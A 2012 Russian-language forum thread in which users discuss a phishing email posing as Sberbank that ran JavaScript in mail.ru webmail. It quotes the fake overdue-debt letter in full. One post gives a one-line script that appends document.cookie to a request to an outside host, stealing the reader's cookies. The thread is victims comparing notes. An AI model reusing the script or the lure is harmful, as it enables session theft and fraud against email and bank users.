Вернуться   Форум SAPE.RU > Другое > Курилка

-->
Ответ
 
Опции темы
Старый 21.08.2012, 00:08   #1
Мастер
 
Аватар для alexandrov_s
 
Регистрация: 14.05.2009
Сообщений: 552
Вес репутации: 205
alexandrov_s - за этого человека можно гордитсяalexandrov_s - за этого человека можно гордитсяalexandrov_s - за этого человека можно гордитсяalexandrov_s - за этого человека можно гордитсяalexandrov_s - за этого человека можно гордитсяalexandrov_s - за этого человека можно гордитсяalexandrov_s - за этого человека можно гордитсяalexandrov_s - за этого человека можно гордитсяalexandrov_s - за этого человека можно гордится
По умолчанию Вирус по почте.

Сейчас на почту пришло письмо якобы от сбербанка. Почту получаю почтовым клиентом в опере. При попытке выделить текст опера зависает и забирает 3,5 Гб памяти.

Текст письма небольшой, но скролбары показывают, что в теле есть еще очень много символов. Почуяв неладное зашел на mail.ru через браузер (каюсь не надо было, пароли уже сменил), открыл то самое письмо хотел выделить текст и тут же выполняется яваскрипт примерно следующего содержания.

Все бы ничего, но вот url в начале скрипта до боли знаком наверное не только мне и принадлежит известному в сапе форумчанину. Что думаете по этому поводу?
alexandrov_s вне форума   Ответить с цитированием
Старый 21.08.2012, 00:28   #2
Куриллочный троль
 
Аватар для Клон
 
Регистрация: 15.03.2010
Сообщений: 8,483
Вес репутации: 521
Клон - прекрасное будущееКлон - прекрасное будущееКлон - прекрасное будущееКлон - прекрасное будущееКлон - прекрасное будущееКлон - прекрасное будущееКлон - прекрасное будущееКлон - прекрасное будущееКлон - прекрасное будущееКлон - прекрасное будущееКлон - прекрасное будущее
Отправить сообщение для Клон с помощью ICQ
По умолчанию

ну не зря он клона регил на другое имя
__________________
2013 год. В прошлом апокалипсис. Страшный апокалипсис. Гнилой апокалипсис. Просто чмо
Клон вне форума   Ответить с цитированием
Старый 21.08.2012, 01:05   #3
Дикий
 
Аватар для D.iK.iJ
 
Регистрация: 02.06.2007
Адрес: <Noindex>
Сообщений: 2,551
Вес репутации: 355
D.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущееD.iK.iJ - прекрасное будущее
По умолчанию

Пересылка с mail.ru почты => Яндекс почту рулит Спама и вирусов меньше в разы.
D.iK.iJ вне форума   Ответить с цитированием
Старый 21.08.2012, 01:05   #4
Bannеd
 
Регистрация: 17.09.2008
Сообщений: 6,446
Вес репутации: 368
Последний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущее
По умолчанию

Цитата:
Сообщение от alexandrov_s Посмотреть сообщение
примерно следующего содержания.
а что за файл в блокноте вы открыли? его содержание никак на скрипт не похоже.

исходный код письма в паблик можно?
Последний Герой вне форума   Ответить с цитированием
Старый 21.08.2012, 01:47   #5
Мастер
 
Аватар для сумрак
 
Регистрация: 02.07.2010
Адрес: Sape-Petersburg
Сообщений: 831
Вес репутации: 233
сумрак - прекрасное будущеесумрак - прекрасное будущеесумрак - прекрасное будущеесумрак - прекрасное будущеесумрак - прекрасное будущеесумрак - прекрасное будущеесумрак - прекрасное будущеесумрак - прекрасное будущеесумрак - прекрасное будущеесумрак - прекрасное будущеесумрак - прекрасное будущее
По умолчанию

Спасибо ПГ за своевременный ахтунг в аську...

Итак по порядку:

Всем доброго времени, ночи, утра, дня, вечера...

Честно скажу, что отношения к данному письму не имею, а даже более - точно такое же письмо получил сегодня и я, вот текст его содержимого (вырезка из самого письма) :

Цитата:
"Сбербанк России"<kredfl@sbrf.ru>
От кого: "teasernet.com" <no-reply@TeaserNet.com>
Кому: ****@mail.ru
20 августа 2012, 23:02
20 Августа 2012

Здравствуйте!
Настоящим сообщаем Вам о наличии просроченной задолженности по банковской карте VISA8330, полученной Вами в ОАО "Сбербанк России" (далее – Банк). На 27.11.11 сумма просроченной задолженности составляет 183.12 RUB.
Несоблюдение условий обслуживания банковской карты влияет на Вашу кредитную историю. В будущем, при рассмотрении вопроса о предоставлении Вам другого кредита, данное обстоятельство может негативно повлиять на решение Банка о возможности его предоставления. Для погашения просроченной задолженности Вам необходимо обратиться в отделение (дополнительный офис) Банка или погасить задолженность иными способами, указанными в Условиях обслуживания банковской карты ОАО "Сбербанк России".
По всем возникающим вопросам о просроченной задолженности Вы можете обратиться по телефону 8-800-700-22-20 (звонок по России бесплатный) либо направить сообщение по адресу электронной почты help@sbrf.ru. В сообщении укажите причину Вашего обращения, Ваш телефон и желаемое время звонка. Оператор позвонит Вам и ответит на Ваши вопросы в удобное для Вас время.
Приносим свои извинения в случае, если Вы погасили свою просроченную задолженность до получения Вами настоящего письма. Со своей стороны, мы ценим Ваше ответственное и аккуратное отношение к исполнению своих обязанностей по кредитному договору.

С уважением,
Подразделение по работе с просроченной задолженностью физических лиц ОАО "Сбербанк России".
Я даже не знал почту Алексея, точнее будет не вспомнил бы, если она мне и сообщалась...

Увидев в теле вашего (Алексея) письма урл - удалил папку "cor" - завтра сменю все пароли...

Прошу прощения, если такой инциндент мог иметь место с сайта x-bus.ru , но даю честное слово, что это не моих рук дело, а злоумышленников.

Готов предоставить необходимый доступ ПГ или Алексею, к самому сайту, для выявления вредителей, если им будет интересно заняться данной процедурой...

С Уважением ко всем форумчанам !!!
сумрак вне форума   Ответить с цитированием
Старый 21.08.2012, 02:27   #6
Мастер
 
Аватар для alexandrov_s
 
Регистрация: 14.05.2009
Сообщений: 552
Вес репутации: 205
alexandrov_s - за этого человека можно гордитсяalexandrov_s - за этого человека можно гордитсяalexandrov_s - за этого человека можно гордитсяalexandrov_s - за этого человека можно гордитсяalexandrov_s - за этого человека можно гордитсяalexandrov_s - за этого человека можно гордитсяalexandrov_s - за этого человека можно гордитсяalexandrov_s - за этого человека можно гордитсяalexandrov_s - за этого человека можно гордится
По умолчанию

Цитата:
Сообщение от Последний Герой Посмотреть сообщение
а что за файл в блокноте вы открыли? его содержание никак на скрипт не похоже.
исходный код письма в паблик можно?
Этот текст выходит в браузере при клике по письму, перед этим все виснет на несколько секунд. В адресной строке в этот момент
Код:
javascript:delf=document.getElementById('delf');delf.style.display='none';img=new Image();img.src="http://x-bus.ru/cor/s.php?"+document.cookie;
А как посмотреть исходный код письма?

Добавлено через 4 минуты
Цитата:
Увидев в теле вашего (Алексея) письма урл - удалил папку "cor" - завтра сменю все пароли...
Уж удалять не нужно было, можно было отследить, что там за скрипт. Очень похоже что куки ворует.

Добавлено через 5 минут
Цитата:
Сообщение от Последний Герой Посмотреть сообщение
а что за файл в блокноте вы открыли? его содержание никак на скрипт не похоже.
исходный код письма в паблик можно?
Только что что понял, что это мои куки.

Последний раз редактировалось alexandrov_s; 21.08.2012 в 02:27. Причина: Добавлено сообщение
alexandrov_s вне форума   Ответить с цитированием
Старый 21.08.2012, 02:29   #7
Мастер
 
Аватар для сумрак
 
Регистрация: 02.07.2010
Адрес: Sape-Petersburg
Сообщений: 831
Вес репутации: 233
сумрак - прекрасное будущеесумрак - прекрасное будущеесумрак - прекрасное будущеесумрак - прекрасное будущеесумрак - прекрасное будущеесумрак - прекрасное будущеесумрак - прекрасное будущеесумрак - прекрасное будущеесумрак - прекрасное будущеесумрак - прекрасное будущеесумрак - прекрасное будущее
По умолчанию

Цитата:
Сообщение от alexandrov_s Посмотреть сообщение
Уж удалять не нужно было, можно было отследить, что там за скрипт. Очень похоже что куки ворует.
Мне просто не хотелось даже оставлять на доли секунд после выявления эту папку - она явно ничего хорошего не даст.
сумрак вне форума   Ответить с цитированием
Старый 21.08.2012, 09:46   #8
Bannеd
 
Регистрация: 17.09.2008
Сообщений: 6,446
Вес репутации: 368
Последний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущее
По умолчанию

Цитата:
Сообщение от alexandrov_s Посмотреть сообщение
Этот текст выходит в браузере при клике по письму, перед этим все виснет на несколько секунд. В адресной строке в этот момент
в вебинтерфейсе майла тоже самое? напишите в их саппорт. там не должны скрипты выполнять в письмах.

Добавлено через 31 секунду
Цитата:
Сообщение от сумрак Посмотреть сообщение
Мне просто не хотелось даже оставлять на доли секунд после выявления эту папку - она явно ничего хорошего не даст.
а она была??

Последний раз редактировалось Последний Герой; 21.08.2012 в 09:46. Причина: Добавлено сообщение
Последний Герой вне форума   Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Договора по почте maxwelhouse Финансовые и юридические вопросы 37 07.12.2009 17:07
Вещи по почте Agito Курилка 11 18.10.2009 14:15
Вопрос по почте. Штрафная РОТА Курилка 2 21.08.2009 14:25
Оповещение об ERROR'ах по почте andrey-k Софт для оптимизаторов и вебмастеров 3 17.03.2009 16:20
договор с САПЕ по почте Mr_ZLO Вопросы по работе системы 2 27.10.2008 08:45


Часовой пояс GMT +3, время: 01:13.